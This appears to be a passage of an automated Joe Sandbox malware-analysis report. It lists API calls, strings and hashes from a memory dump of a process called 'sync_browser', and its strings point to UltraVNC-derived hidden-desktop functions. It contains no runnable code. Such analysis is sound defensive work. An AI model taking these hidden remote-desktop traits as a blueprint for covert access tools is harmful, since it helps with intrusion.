                                                                                          • String ID: HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x
                                                                                          • API String ID: 2777246624-1049114938
                                                                                          • Opcode ID: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                                          • Instruction ID: 5316b763691ce82a2aced02f5d9cb63be24ec9e1f75e249eedb31c53ee5893e7
                                                                                          • Opcode Fuzzy Hash: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                                          • Instruction Fuzzy Hash: E6215337A28A8286E714CF11F4402A5B7A8FB55748F540235FA9E97A69DF3CE54AC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
                                                                                          • String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
                                                                                          • API String ID: 542764273-2415377678
                                                                                          • Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                                          • Instruction ID: 8dbaf1849b34b050d31b4e2dc379e5dff346be4b56735bc86ddca8000eac802c
                                                                                          • Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                                          • Instruction Fuzzy Hash: 3F011B77E2854396F7509F60E8046B57769BB74309F404132F80E976A6DE3CA21EC751
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF67E87ABE5,?,?,00000028,00007FF67E878C7D,?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749), ref: 00007FF67E87ABAB
                                                                                          • GetProcAddress.KERNEL32(?,?,000000FF,00007FF67E87ABE5,?,?,00000028,00007FF67E878C7D,?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749), ref: 00007FF67E87ABC0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 1646373207-1276376045
                                                                                          • Opcode ID: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
                                                                                          • Instruction ID: ccf63851f2a67b5a5d4badf5087875c8a898214f7d09681255fbc36262220515
                                                                                          • Opcode Fuzzy Hash: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
                                                                                          • Instruction Fuzzy Hash: 88E01213F3670282FE199BE1A89557453519F78740F4814B8D45E8A390EE2CF59DC300
                                                                                          APIs
                                                                                          Strings
                                                                                          • i, xrefs: 00007FF67E7EA754
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF67E7EA5D6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
                                                                                          • API String ID: 3168844106-2727237473
                                                                                          • Opcode ID: 04e423f7ce06a793ccdcdf8c84ad800bad76bca22520f4e944dcdf361ee1b220
                                                                                          • Instruction ID: 62a26dad7513a79d02895e1982034da0969249615f830963d62525fdc270fb46
                                                                                          • Opcode Fuzzy Hash: 04e423f7ce06a793ccdcdf8c84ad800bad76bca22520f4e944dcdf361ee1b220
                                                                                          • Instruction Fuzzy Hash: E261CC23B28BC295EA65CB25D4447FA67A0FB96794F044235EA9D877C5DF3CD488C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DataRegion$DeleteObject
                                                                                          • String ID:
                                                                                          • API String ID: 3467850875-0
                                                                                          • Opcode ID: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
                                                                                          • Instruction ID: 8242c6095501188df10554828d8089a66c4dd85e18913b75c38cc1c6383eedff
                                                                                          • Opcode Fuzzy Hash: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
                                                                                          • Instruction Fuzzy Hash: 1051DFB7A15A818BD790CF29D440AADB7E5FB58B98B55A132EA4DC3350DF3CD885CB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CountEnterInitializeSpin_amsg_exit_lockfree
                                                                                          • String ID:
                                                                                          • API String ID: 3786353176-0
                                                                                          • Opcode ID: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                                                          • Instruction ID: 65601c50415b2af002aee0faf382b18fbfb797f9d9bd64cd5e79d7af15eef1a1
                                                                                          • Opcode Fuzzy Hash: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                                                          • Instruction Fuzzy Hash: 28418E27A38A4286FB109B15E454339B3A1FF64B84F544536EE9D8B6A1DF3CE848C304
                                                                                          APIs
                                                                                          • malloc.LIBCMT ref: 00007FF67E7CC5D4
                                                                                            • Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
                                                                                            • Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
                                                                                            • Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
                                                                                            • Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
                                                                                            • Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errno$AllocHeap_callnewhmalloc
                                                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
                                                                                          • API String ID: 908589684-1814909704
                                                                                          • Opcode ID: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                                                          • Instruction ID: aa5bee93cca6aa707d176948b987c4409cc35d89a246433cef606fc3aa613333
                                                                                          • Opcode Fuzzy Hash: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
                                                                                          • Instruction Fuzzy Hash: 75219C33B287954AD350CB69E840228B799E764790F092336FBAC8BBD5DE3ED006C700
                                                                                          APIs
                                                                                          • Sleep.KERNEL32 ref: 00007FF67E7D7720
                                                                                            • Part of subcall function 00007FF67E7D7A30: SetEvent.KERNEL32(?,?,?,00007FF67E7D76B4), ref: 00007FF67E7D7A4B
                                                                                            • Part of subcall function 00007FF67E7D7A30: SetEvent.KERNEL32(?,?,?,00007FF67E7D76B4), ref: 00007FF67E7D7A55
                                                                                            • Part of subcall function 00007FF67E7D7A30: SetEvent.KERNEL32(?,?,?,00007FF67E7D76B4), ref: 00007FF67E7D7A5F
                                                                                            • Part of subcall function 00007FF67E7D7A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF67E7D76B4), ref: 00007FF67E7D7A8B
                                                                                            • Part of subcall function 00007FF67E7D7A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF67E7D76B4), ref: 00007FF67E7D7A95
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Event$CriticalInitializeSection$Sleepmalloc
                                                                                          • String ID: keyEvent$start_event$stop_event
                                                                                          • API String ID: 367317321-1979648887
                                                                                          • Opcode ID: 75cee7831a348fbdeec11479aba58ed98617e6988499cf48a05d465c35e79d83
                                                                                          • Instruction ID: ff2e80b9284086d06a69bc78a252dc9502b4f138f12699051c9f394bb91ec106
                                                                                          • Opcode Fuzzy Hash: 75cee7831a348fbdeec11479aba58ed98617e6988499cf48a05d465c35e79d83
                                                                                          • Instruction Fuzzy Hash: 9D31492BE39A4340FA60EB54E554776A391AFA6754F640035F94E8FBA2DE7CE44CC340
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 2819658684-0
                                                                                          • Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                                          • Instruction ID: 5a10487601a5c05499e4dd3c24c7e81d557663bd5bfae4ebd2db87f10d770eab
                                                                                          • Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                                          • Instruction Fuzzy Hash: 40217F23B2924345F7615AB5580133DE294AF69BC0F454431F98DC7B86DE2CE854C700
                                                                                          APIs
                                                                                          • malloc.LIBCMT ref: 00007FF67E843CCE
                                                                                            • Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
                                                                                            • Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
                                                                                            • Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
                                                                                            • Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
                                                                                            • Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8
                                                                                          • free.LIBCMT ref: 00007FF67E843CFA
                                                                                            • Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
                                                                                            • Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
                                                                                            • Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C
                                                                                          • free.LIBCMT ref: 00007FF67E843D0E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                                          • String ID: Unable to allocate memory in zip library at %s
                                                                                          • API String ID: 1063416079-1743894623
                                                                                          • Opcode ID: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
                                                                                          • Instruction ID: ae399c8f34e9911cb37ff90014563b65a5c6687f31605dc6281fe98264fe7a68
                                                                                          • Opcode Fuzzy Hash: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
                                                                                          • Instruction Fuzzy Hash: 4611B122639BC285EA50DF55E440179B764FBA5BD4F080132FA9D87796DE2CE4498704
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Global$FreeUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 1239146723-0
                                                                                          • Opcode ID: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                                                          • Instruction ID: 335b68659c3854b1ae3e0ef85ecbe4ffc334d59f04201cceb8f3c697bf2ed721
                                                                                          • Opcode Fuzzy Hash: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
                                                                                          • Instruction Fuzzy Hash: 32213933A29A4182FB409F65E85016CA3A8FBA4F88F180535FA4EC7666CF7CD4998740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Write$ConsoleDebugFileHandleOutputString
                                                                                          • String ID:
                                                                                          • API String ID: 1934604790-0
                                                                                          • Opcode ID: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
                                                                                          • Instruction ID: ac7ee2e66bdd1b507c21fd4af3f33146b3bc88fd4a977fe1821cdf1826e4d8a5
                                                                                          • Opcode Fuzzy Hash: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
                                                                                          • Instruction Fuzzy Hash: E911E326A28A8040E7508B79A4043A9F7A1EB45FF4F184325EEBD47BD4CF3CC489C300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
